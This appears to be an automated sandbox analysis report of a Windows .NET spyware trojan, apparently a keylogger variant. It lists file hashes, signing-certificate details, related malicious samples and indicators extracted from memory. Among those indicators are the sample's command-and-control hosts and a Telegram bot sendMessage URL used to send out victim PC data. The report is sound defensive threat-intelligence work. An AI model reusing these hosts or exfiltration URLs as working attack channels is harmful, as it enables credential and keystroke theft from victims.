                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoInstallUtil.exe, 0000000A.00000002.2531605024.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2531605024.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://api.telegram.org/botsS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                              high
                                              https://www.office.com/lBInstallUtil.exe, 0000000A.00000002.2528573106.0000000002D63000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=InstallUtil.exe, 0000000A.00000002.2531605024.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2531605024.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://checkip.dyndns.orgInstallUtil.exe, 0000000A.00000002.2528573106.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=InstallUtil.exe, 0000000A.00000002.2531605024.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2531605024.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://api.telegram.org/bot/sendMessage?chat_id=&text=InstallUtil.exe, 0000000A.00000002.2528573106.0000000002C86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://chrome.google.com/webstore?hl=enInstallUtil.exe, 0000000A.00000002.2528573106.0000000002D27000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.ecosia.org/newtab/InstallUtil.exe, 0000000A.00000002.2531605024.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2531605024.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://varders.kozow.com:8081sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://aborters.duckdns.org:8081sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://ac.ecosia.org/autocomplete?q=InstallUtil.exe, 0000000A.00000002.2531605024.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2531605024.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20aInstallUtil.exe, 0000000A.00000002.2528573106.0000000002C86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://anotherarmy.dns.army:8081sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchInstallUtil.exe, 0000000A.00000002.2531605024.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2531605024.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
http://checkip.dyndns.org/q | sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | high
https://chrome.google.com/webstore?hl=enlB | InstallUtil.exe, 0000000A.00000002.2528573106.0000000002D31000.00000004.00000800.00020000.00000000.sdmp | false | high
https://reallyfreegeoip.org/xml/8.46.123.189$ | InstallUtil.exe, 0000000A.00000002.2528573106.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002C5F000.00000004.00000800.00020000.00000000.sdmp | false | high
https://reallyfreegeoip.org | InstallUtil.exe, 0000000A.00000002.2528573106.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002C5F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002BEF000.00000004.00000800.00020000.00000000.sdmp | false | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | InstallUtil.exe, 0000000A.00000002.2528573106.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp | false | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | InstallUtil.exe, 0000000A.00000002.2531605024.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2531605024.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp | false | high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | high
https://reallyfreegeoip.org/xml/ | sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002BEF000.00000004.00000800.00020000.00000000.sdmp | false | high
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
104.21.64.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
158.101.44.242 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1588892
Start date and time: 2025-01-11 06:48:04 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 7s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: sS7Jrsk0Z7.exe (renamed because the original name is a hash value)
Original Sample Name: 399908f6dc7e0dcad418f2cadd782f26f66adfdf1e523725dbc14713033c44a7.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/1@3/3
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 194
• Number of non-executed functions: 37
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 2.23.242.162, 13.107.246.45, 20.109.210.53
• Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target InstallUtil.exe, PID 7612 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
00:49:09 | API Interceptor | 104x Sleep call for process: sS7Jrsk0Z7.exe modified
01:59:34 | API Interceptor | 214846x Sleep call for process: InstallUtil.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | lkETeneRL3.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | 5qJ6QQTcRS.exe | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger |
149.154.167.220 | 4NG0guPiKA.exe | malicious | GuLoader, MassLogger RAT |
149.154.167.220 | n0nsAzvYNd.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger |
149.154.167.220 | njVvgA8pEB.exe | malicious | MassLogger RAT, PureLog Stealer |
149.154.167.220 | YDg44STseR.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | ZoRLXzC5qF.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger |
149.154.167.220 | 6BRa130JDj.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | 4AMVusDMPP.exe | malicious | GuLoader, MassLogger RAT |
149.154.167.220 | JGvCEaqruI.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer |
104.21.64.1 | SpCuEoekPa.exe | malicious | FormBook | www.mffnow.info/0pqe/
104.21.64.1 | 4sfN3Gx1vO.exe | malicious | FormBook | www.vilakodsiy.sbs/w7eo/
104.21.64.1 | 1162-201.exe | malicious | FormBook | www.mzkd6gp5.top/utww/
104.21.64.1 | QUOTATION#050125.exe | malicious | FormBook | www.mzkd6gp5.top/3u0p/
104.21.64.1 | Sales Acknowledgement - HES #982323.pdf | malicious | Unknown | ordrr.statementquo.com/QCbxA/
104.21.64.1 | SH8ZyOWNi2.exe | malicious | CMSBrute | adsfirm.com/administrator/index.php
104.21.64.1 | PO2412010.exe | malicious | FormBook | www.bser101pp.buzz/v89f/
158.101.44.242 | 3qr7JBuNuX.exe | malicious | MassLogger RAT | checkip.dyndns.org/
158.101.44.242 | lkETeneRL3.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
158.101.44.242 | 5qJ6QQTcRS.exe | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
158.101.44.242 | prlsqnzspl.exe | malicious | MassLogger RAT | checkip.dyndns.org/
158.101.44.242 | njVvgA8pEB.exe | malicious | MassLogger RAT, PureLog Stealer | checkip.dyndns.org/
158.101.44.242 | yqfze5TKW7.exe | malicious | MassLogger RAT, PureLog Stealer | checkip.dyndns.org/
158.101.44.242 | VCU262Y2QB.exe | malicious | Snake Keylogger | checkip.dyndns.org/
158.101.44.242 | WGi85dsMNp.exe | malicious | GuLoader | checkip.dyndns.org/
158.101.44.242 | 3i1gMM8K4z.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
158.101.44.242 | vnV17JImCH.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
checkip.dyndns.com | 3qr7JBuNuX.exe | malicious | MassLogger RAT | 158.101.44.242
checkip.dyndns.com | lkETeneRL3.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
checkip.dyndns.com | 5qJ6QQTcRS.exe | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger | 158.101.44.242
checkip.dyndns.com | prgNb8YFEA.exe | malicious | Snake Keylogger | 193.122.6.168
checkip.dyndns.com | rlPy5vt1Dg.exe | malicious | MassLogger RAT | 132.226.247.73
checkip.dyndns.com | wZ6VEnOkie.exe | malicious | Snake Keylogger | 132.226.247.73
checkip.dyndns.com | prlsqnzspl.exe | malicious | MassLogger RAT | 158.101.44.242
checkip.dyndns.com | dZMT94YYwO.exe | malicious | MassLogger RAT | 193.122.130.0
checkip.dyndns.com | tNXl4XhgmV.exe | malicious | MassLogger RAT | 132.226.247.73
checkip.dyndns.com | MBOaS3GRtF.exe | malicious | Snake Keylogger | 132.226.8.169
reallyfreegeoip.org | 3qr7JBuNuX.exe | malicious | MassLogger RAT | 104.21.16.1
reallyfreegeoip.org | lkETeneRL3.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.112.1
reallyfreegeoip.org | 5qJ6QQTcRS.exe | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger | 104.21.112.1
reallyfreegeoip.org | prgNb8YFEA.exe | malicious | Snake Keylogger | 104.21.112.1
reallyfreegeoip.org | rlPy5vt1Dg.exe | malicious | MassLogger RAT | 104.21.48.1
reallyfreegeoip.org | wZ6VEnOkie.exe | malicious | Snake Keylogger | 104.21.80.1
reallyfreegeoip.org | prlsqnzspl.exe | malicious | MassLogger RAT | 104.21.48.1
reallyfreegeoip.org | dZMT94YYwO.exe | malicious | MassLogger RAT | 104.21.16.1
reallyfreegeoip.org | tNXl4XhgmV.exe | malicious | MassLogger RAT | 104.21.48.1
reallyfreegeoip.org | MBOaS3GRtF.exe | malicious | Snake Keylogger | 104.21.64.1
api.telegram.org | lkETeneRL3.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | 5qJ6QQTcRS.exe | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | 4NG0guPiKA.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
api.telegram.org | n0nsAzvYNd.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | njVvgA8pEB.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220
api.telegram.org | YDg44STseR.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | ZoRLXzC5qF.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | 6BRa130JDj.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | 4AMVusDMPP.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
api.telegram.org | JGvCEaqruI.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 149.154.167.220
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            TELEGRAMRUlkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            n0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            6BRa130JDj.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            JGvCEaqruI.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            ORACLE-BMC-31898US3qr7JBuNuX.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 158.101.44.242
                                                                                                            lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 158.101.44.242
                                                                                                            5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 158.101.44.242
                                                                                                            prgNb8YFEA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 193.122.6.168
prlsqnzspl.exe | Get hash | malicious | MassLogger RAT | Browse | 158.101.44.242
dZMT94YYwO.exe | Get hash | malicious | MassLogger RAT | Browse | 193.122.130.0
fpIGwanLZi.exe | Get hash | malicious | Snake Keylogger | Browse | 193.122.6.168
n0nsAzvYNd.exe | Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | 193.122.130.0
njVvgA8pEB.exe | Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse | 158.101.44.242
rwlPT9YJt0.exe | Get hash | malicious | Snake Keylogger | Browse | 193.122.130.0
Match: CLOUDFLARENETUS
3qr7JBuNuX.exe | Get hash | malicious | MassLogger RAT | Browse | 104.21.16.1
lkETeneRL3.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.112.1
5qJ6QQTcRS.exe | Get hash | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger | Browse | 104.21.112.1
https://mrohailkhan.com/energyaustralia/auth/auhs1/ | Get hash | malicious | Unknown | Browse | 172.64.155.59
3.elf | Get hash | malicious | Unknown | Browse | 1.1.1.1
prgNb8YFEA.exe | Get hash | malicious | Snake Keylogger | Browse | 104.21.112.1
wSoShbuXnJ.exe | Get hash | malicious | FormBook | Browse | 104.21.86.111
1507513743282749438.js | Get hash | malicious | Strela Downloader | Browse | 162.159.61.3
rlPy5vt1Dg.exe | Get hash | malicious | MassLogger RAT | Browse | 104.21.48.1
C6Abn5cBei.exe | Get hash | malicious | FormBook | Browse | 172.67.145.234
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match: 54328bd36c14bd82ddaa0c04b25ed9ad
3qr7JBuNuX.exe | Get hash | malicious | MassLogger RAT | Browse | 104.21.64.1
lkETeneRL3.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.64.1
5qJ6QQTcRS.exe | Get hash | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger | Browse | 104.21.64.1
prgNb8YFEA.exe | Get hash | malicious | Snake Keylogger | Browse | 104.21.64.1
rlPy5vt1Dg.exe | Get hash | malicious | MassLogger RAT | Browse | 104.21.64.1
wZ6VEnOkie.exe | Get hash | malicious | Snake Keylogger | Browse | 104.21.64.1
prlsqnzspl.exe | Get hash | malicious | MassLogger RAT | Browse | 104.21.64.1
dZMT94YYwO.exe | Get hash | malicious | MassLogger RAT | Browse | 104.21.64.1
tNXl4XhgmV.exe | Get hash | malicious | MassLogger RAT | Browse | 104.21.64.1
MBOaS3GRtF.exe | Get hash | malicious | Snake Keylogger | Browse | 104.21.64.1
Match: 3b5074b1b5d032e5620f69f9f700ff0e
lkETeneRL3.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
5qJ6QQTcRS.exe | Get hash | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
ZFCKpFXpzx.exe | Get hash | malicious | Unknown | Browse | 149.154.167.220
ZFCKpFXpzx.exe | Get hash | malicious | Unknown | Browse | 149.154.167.220
ZeAX5i7cGB.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 149.154.167.220
jKqPSehspS.exe | Get hash | malicious | AgentTesla | Browse | 149.154.167.220
A6AHI7Uk18.exe | Get hash | malicious | AgentTesla | Browse | 149.154.167.220
Wru9ycO2MJ.exe | Get hash | malicious | AgentTesla | Browse | 149.154.167.220
iNFGd6bDZX.exe | Get hash | malicious | AgentTesla | Browse | 149.154.167.220
MyzWeEOlqb.exe | Get hash | malicious | AgentTesla | Browse | 149.154.167.220
No context
Process: C:\Users\user\Desktop\sS7Jrsk0Z7.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4x84qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHxviYHKh3oPtHo6hAHKzea
MD5: 7B709BC412BEC5C3CFD861C041DAD408
SHA1: 532EA6BB3018AE3B51E7A5788F614A6C49252BCF
SHA-256: 733765A1599E02C53826A4AE984426862AA714D8B67F889607153888D40BBD75
SHA-512: B35CFE36A1A40123FDC8A5E7C804096FF33F070F40CBA5812B98F46857F30BA2CE6F86E1B5D20F9B6D00D6A8194B8FA36C27A0208C7886512877058872277963
Malicious: true
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 6.666819662352509
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 50.01%
• Win32 Executable (generic) a (10002005/4) 49.97%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: sS7Jrsk0Z7.exe
File size: 832'320 bytes
MD5: 6de308ce9b42f3ca44d87cd354dde9ae
SHA1: 6071d1e4f71527bb4e23f0ffce53b30dcb89500b
SHA256: 399908f6dc7e0dcad418f2cadd782f26f66adfdf1e523725dbc14713033c44a7
SHA512: f9ad8c8723ee9f48450528599329cc782d08e377ca7ca49b6e8c5c9246054439334b9075822fbb282759dd60f22ad1a2f994174dd661e547cf2d4533b1c9ed27
SSDEEP: 12288:6S4rjpK9J4kLI4MlOIg5MCao3AiqLwgDz7PANSoZ:QwJXLIjOUo3A9Lv7PAB
TLSH: 7505F0007BE88878F9ED9A359930C7A14235FC1758A7D76F0A8D797B3C706121DE27A2
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L............................t.......-... ...@....@.. ....................................`................................
Icon Hash: 74f0d4d4d4d4d4cc
Entrypoint: 0x4b2dde
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x18D307F8 [Mon Mar 14 09:48:40 1983 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Signature Valid: false
Signature Issuer: CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232
Not Before, Not After:
• 12/09/2023 10:27:07, 12/09/2024 10:27:07
Subject Chain:
• CN="Aicho Software Technology Co, Ltd.", O="Aicho Software Technology Co, Ltd.", L=Nanjing, S=Jiangsu, C=CN, OID.1.3.6.1.4.1.311.60.2.1.1=Nanjing, OID.1.3.6.1.4.1.311.60.2.1.2=Jiangsu, OID.1.3.6.1.4.1.311.60.2.1.3=CN, SERIALNUMBER=91320192MA1YED3N92, OID.2.5.4.15=Private Organization
Version: 3
Thumbprint MD5: 79D38F2D406C7322713C7279ED705306
Thumbprint SHA-1: 2FD2C86844F5A22BE05D4D9AFFAB5700E7543583
Thumbprint SHA-256: ACA29813062BD0DBC01DBE01A055F150851C540C1ED4ABA824FF6347B259D302
Serial: 17316E9A9363855F7E003DF9
                                                                                                            Instruction
                                                                                                            jmp dword ptr [00402000h]
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
